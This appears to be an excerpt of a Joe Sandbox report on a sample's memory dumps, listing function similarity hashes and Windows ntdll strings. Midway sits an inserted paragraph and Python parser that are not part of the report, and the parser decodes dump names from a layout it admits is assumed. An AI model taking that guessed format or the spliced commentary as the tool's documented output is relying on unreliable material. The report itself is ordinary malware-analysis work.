                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                                                • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                                                                • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                                                • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                                                • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                                                                • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                                                • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                                                                APIs
                                                                                Strings
                                                                                • Kernel-MUI-Number-Allowed, xrefs: 009487E6
                                                                                • Kernel-MUI-Language-Allowed, xrefs: 00948827
                                                                                • Kernel-MUI-Language-SKU, xrefs: 009489FC
                                                                                • WindowsExcludedProcs, xrefs: 009487C1
                                                                                • Kernel-MUI-Language-Disallowed, xrefs: 00948914
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: _wcspbrk
                                                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                • API String ID: 402402107-258546922
                                                                                • Opcode ID: ea5729df122829a5e8794eeca1b69d3731786de75340a925a884ba8b3b814f86
                                                                                • Instruction ID: eec668b6938623f9b9436ea9632081af0f4c1342fa2293b6c45c678ccf3bf1e6
                                                                                • Opcode Fuzzy Hash: ea5729df122829a5e8794eeca1b69d3731786de75340a925a884ba8b3b814f86
                                                                                • Instruction Fuzzy Hash: 9CF1E3B2D00219EFCF11EF99C981EEEBBB9FF48304F15446AE505A7211EB349A45DB60
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: _wcsnlen
                                                                                • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                                                                • API String ID: 3628947076-1387797911
                                                                                • Opcode ID: 73e98298583b5eb31701aacce60cd5b755368834273074caab03c817f3e1acc5
                                                                                • Instruction ID: c9135bd1715321cff7a85693af1a594b04e4eda85ed0fc3555cca8808ff53dd0
                                                                                • Opcode Fuzzy Hash: 73e98298583b5eb31701aacce60cd5b755368834273074caab03c817f3e1acc5
                                                                                • Instruction Fuzzy Hash: EC41A572249209BAEB119AD0CE42FDFB7ACEF48B64F104122FA04D6191DBB0DB51C7A4
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: ___swprintf_l
                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                • API String ID: 48624451-2108815105
                                                                                • Opcode ID: 4972c33cf10492ea9ecc1496663867f614997e95921c70ef63e4757d90bf4df7
                                                                                • Instruction ID: ae4870abe607ce0fe14dde98dbd033f57bc04b9360ac77b99d088b838ca420db
                                                                                • Opcode Fuzzy Hash: 4972c33cf10492ea9ecc1496663867f614997e95921c70ef63e4757d90bf4df7
                                                                                • Instruction Fuzzy Hash: 966157B1904655AACF34DF99C8908BEBBB9EFD4301B18C42EF4DA47680D775AA40DB60
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: ___swprintf_l
                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                • API String ID: 48624451-2108815105
                                                                                • Opcode ID: 62ad5cea72158828d27840b586902092ad5c9dd70920a2382eb1d9b3e89cfe80
                                                                                • Instruction ID: 4b15a40aadf8151ad29f7d92cff12e9a0d9f109a57fa07f0799b5ee6431b50f5
                                                                                • Opcode Fuzzy Hash: 62ad5cea72158828d27840b586902092ad5c9dd70920a2382eb1d9b3e89cfe80
                                                                                • Instruction Fuzzy Hash: 4F61B172D40648ABCB20DF58C851ABE7BF9EF99310B14C52EF8ED97141E234EB409B52
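The two ___swprintf_l records above carry the same API String ID (48624451-2108815105) but different Opcode IDs, which is the signal Joe Sandbox's Similarity section is built to expose: two distinct functions with identical API and string usage. The following script is an added example written for this page, not Joe Sandbox's own tooling. It parses records in the plain-text layout shown here (each record ends with its "Instruction Fuzzy Hash" line), groups them by API String ID, splits the "$"-joined String ID back into individual strings, and decodes the process ID and base address from the .sdmp dump name. The sample input is constructed from three records on this page with the Associated lists trimmed; the field order assumed for the .sdmp name (PID, phase, timestamp, base address, protection) is an assumption and is marked as such in the code.

```python
"""Parse the per-function 'Similarity' records of a Joe Sandbox report excerpt.

Added example, not Joe Sandbox code. Assumes the plain-text record layout seen
on this page, where every record ends with the '• Instruction Fuzzy Hash:' line.
"""
import re
from collections import defaultdict

# Constructed sample: three records from this page, Associated lists omitted.
SAMPLE = """\
Memory Dump Source
• Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Opcode ID: 4972c33cf10492ea9ecc1496663867f614997e95921c70ef63e4757d90bf4df7
• Opcode Fuzzy Hash: 4972c33cf10492ea9ecc1496663867f614997e95921c70ef63e4757d90bf4df7
• Instruction Fuzzy Hash: 966157B1904655AACF34DF99C8908BEBBB9EFD4301B18C42EF4DA47680D775AA40DB60
Memory Dump Source
• Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Opcode ID: 62ad5cea72158828d27840b586902092ad5c9dd70920a2382eb1d9b3e89cfe80
• Opcode Fuzzy Hash: 62ad5cea72158828d27840b586902092ad5c9dd70920a2382eb1d9b3e89cfe80
• Instruction Fuzzy Hash: 4F61B172D40648ABCB20DF58C851ABE7BF9EF99310B14C52EF8ED97141E234EB409B52
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
Similarity
• API ID: __fassign
• String ID: .$:$:
• API String ID: 3965848254-2308638275
• Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
• Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
• Instruction Fuzzy Hash: 00A19F71D0030ADFDF24DFA4C8857BFB7B9AF95304F24856AD482A7282D7389A45CB51
"""

FIELD = re.compile(r"^\s*•\s*(API ID|String ID|API String ID|Opcode ID|Instruction ID|"
                   r"Opcode Fuzzy Hash|Instruction Fuzzy Hash|Source File):\s*(.*)$")
# Assumed .sdmp layout: <pid hex>.<phase>.<timestamp>.<base hex>.<protect hex>...
SDMP = re.compile(r"^([0-9A-Fa-f]{8})\.(\d{8})\.\d+\.([0-9A-Fa-f]{16})\.([0-9A-Fa-f]{8})\.")
PAGE_EXECUTE_READWRITE = 0x40  # Win32 memory protection constant


def parse_records(text):
    """Return one dict per function record, keyed by the bullet field names."""
    records, cur = [], {}
    for line in text.splitlines():
        m = FIELD.match(line)
        if not m:
            continue
        key, val = m.group(1), m.group(2).strip()
        if key == "Source File":
            val = val.split(",", 1)[0]  # drop ', Offset: ..., based on PE: ...'
        cur[key] = val
        if key == "Instruction Fuzzy Hash":  # last field of every record
            records.append(cur)
            cur = {}
    return records


def strings_of(rec):
    """Split the '$'-joined String ID back into the individual strings."""
    sid = rec.get("String ID", "")
    return sid.split("$") if sid else []


def shared_api_string_ids(records):
    """API String IDs that more than one function shares -> their Opcode IDs."""
    groups = defaultdict(list)
    for r in records:
        if r.get("API String ID"):
            groups[r["API String ID"]].append(r["Opcode ID"])
    return {k: v for k, v in groups.items() if len(v) > 1}


def decode_sdmp_name(name):
    """PID, dump phase, base address and protection from a .sdmp name (assumed layout)."""
    m = SDMP.match(name)
    if not m:
        raise ValueError("unrecognised dump name: " + name)
    pid, phase, base, protect = m.groups()
    return {"pid": int(pid, 16), "phase": int(phase),
            "base": int(base, 16), "protect": int(protect, 16)}


def mismatched_opcode_ids(records):
    """Records whose Opcode ID differs from their Opcode Fuzzy Hash (none on this page)."""
    return [r["Opcode ID"] for r in records
            if r.get("Opcode ID") != r.get("Opcode Fuzzy Hash")]


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for api_string_id, opcode_ids in shared_api_string_ids(recs).items():
        print(api_string_id, "->", [o[:12] for o in opcode_ids])
    info = decode_sdmp_name(recs[0]["Source File"])
    print(info, "RWX" if info["protect"] == PAGE_EXECUTE_READWRITE else "")
```

Run it against the full report text instead of SAMPLE to see every API String ID that several functions share; an RWX, PE-backed private region such as the one at 0x910000 in PID 11 is the kind of dump worth carving out and diffing against the on-disk module whose strings it contains.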
                                                                                APIs
                                                                                • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00973F12
                                                                                Strings
                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00973EC4
                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0097E2FB
                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 0097E345
                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00973F4A
                                                                                • Execute=1, xrefs: 00973F5E
                                                                                • ExecuteOptions, xrefs: 00973F04
                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00973F75
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: BaseDataModuleQuery
                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                • API String ID: 3901378454-484625025
                                                                                • Opcode ID: 5624c1a3517b7b6a846d41cc74150833ef111555cbd1d27fcd8fae2a7b228b34
                                                                                • Instruction ID: 0ce990ba21a3b1a440ff59769b3f51141cc6c63a58f19bc32229373508488e10
                                                                                • Opcode Fuzzy Hash: 5624c1a3517b7b6a846d41cc74150833ef111555cbd1d27fcd8fae2a7b228b34
                                                                                • Instruction Fuzzy Hash: C841A97264031C7BDB20DB95ECC6FEAB3BCAB54705F0044A9F909E6181E6709B459F61
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: __fassign
                                                                                • String ID: .$:$:
                                                                                • API String ID: 3965848254-2308638275
                                                                                • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                • Instruction ID: af674629a0f956a644b59a3c3b802fbdb8e49866f5cc11d63921204a1b2a315a
                                                                                • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                • Instruction Fuzzy Hash: 00A19F71D0030ADFDF24DFA4C8857BFB7B9AF95304F24856AD482A7282D7389A45CB51
                                                                                APIs
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00982206
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                • API String ID: 885266447-4236105082
                                                                                • Opcode ID: 59f08a282faa4c420f0fc9b4342fa4342a06c891dca7008669db12de88f9d778
                                                                                • Instruction ID: e85e9dc92339a425259b72e858c77936d78bd0037adfea23ab8281069589f657
                                                                                • Opcode Fuzzy Hash: 59f08a282faa4c420f0fc9b4342fa4342a06c891dca7008669db12de88f9d778
                                                                                • Instruction Fuzzy Hash: 2F5138317042156FEB14DB18DCC2FA633ADABD4720F218269FC59DB385D975EC418B90
                                                                                APIs
                                                                                • ___swprintf_l.LIBCMT ref: 0098EA22
                                                                                  • Part of subcall function 009613CB: ___swprintf_l.LIBCMT ref: 0096146B
                                                                                  • Part of subcall function 009613CB: ___swprintf_l.LIBCMT ref: 00961490
                                                                                • ___swprintf_l.LIBCMT ref: 0096156D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: ___swprintf_l
                                                                                • String ID: %%%u$]:%u
                                                                                • API String ID: 48624451-3050659472
                                                                                • Opcode ID: 1c844c141e130c84103369c93898b7f855893a66e8cc0142b8507b627a662c3f
                                                                                • Instruction ID: 36043da76b819bdf085d6c046f88818ee0ace6942009f231e6a4d3b21182b3c8
                                                                                • Opcode Fuzzy Hash: 1c844c141e130c84103369c93898b7f855893a66e8cc0142b8507b627a662c3f
                                                                                • Instruction Fuzzy Hash: 9A21A5729002299FCF21EE54DC45AEEB3ACAB94700F484555FC47D3241DB74EE588BE1
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: ___swprintf_l
                                                                                • String ID: %%%u$]:%u
                                                                                • API String ID: 48624451-3050659472
                                                                                • Opcode ID: 7da8098ffed6a27ee8148e9f03c7f35f5eecf644c18a88bb5a94bfef05af4a8f
                                                                                • Instruction ID: 3263c5158371ef3f4a178b0748e426d35ac2d5713c1062960c73bf9c0bb83dd9
                                                                                • Opcode Fuzzy Hash: 7da8098ffed6a27ee8148e9f03c7f35f5eecf644c18a88bb5a94bfef05af4a8f
                                                                                • Instruction Fuzzy Hash: 9C21A172D0022AABCB10AE699C45EEF77AC9B54714F04C52AFC4593242E7749E44C7E2
                                                                                APIs
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009822F4
                                                                                Strings
                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 009822FC
                                                                                • RTL: Resource at %p, xrefs: 0098230B
                                                                                • RTL: Re-Waiting, xrefs: 00982328
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                • API String ID: 885266447-871070163
                                                                                • Opcode ID: 7b86c822cbb0e69a2f6818cd3f510ab08ce56b5a5b1a6d32f3d8711a827686f4
                                                                                • Instruction ID: cb1b6fc7e38465670291edf029cc9b26bb7b5b1358641e454a77219d92c1c855
                                                                                • Opcode Fuzzy Hash: 7b86c822cbb0e69a2f6818cd3f510ab08ce56b5a5b1a6d32f3d8711a827686f4
                                                                                • Instruction Fuzzy Hash: AF512671700705ABDB14EF68DC81FA6739CEF98760F114229FD18DB282EA65ED418BA0
                                                                                Strings
                                                                                • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0098248D
                                                                                • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 009824BD
                                                                                • RTL: Re-Waiting, xrefs: 009824FA
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                • API String ID: 0-3177188983
                                                                                • Opcode ID: 8c252a7dda93bd9a08a4a9c622d97e07ea575dca98d69b2811a4c78a14cac4bc
                                                                                • Instruction ID: 44322ae05614d4fd9bebf3a06761487f6e22c3b10c33214cd0145c5950818505
                                                                                • Opcode Fuzzy Hash: 8c252a7dda93bd9a08a4a9c622d97e07ea575dca98d69b2811a4c78a14cac4bc
                                                                                • Instruction Fuzzy Hash: A341E671A00208ABDB20EF68DC85FAA77A9FF85720F208A15F555DB3D1D774E9418B70
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
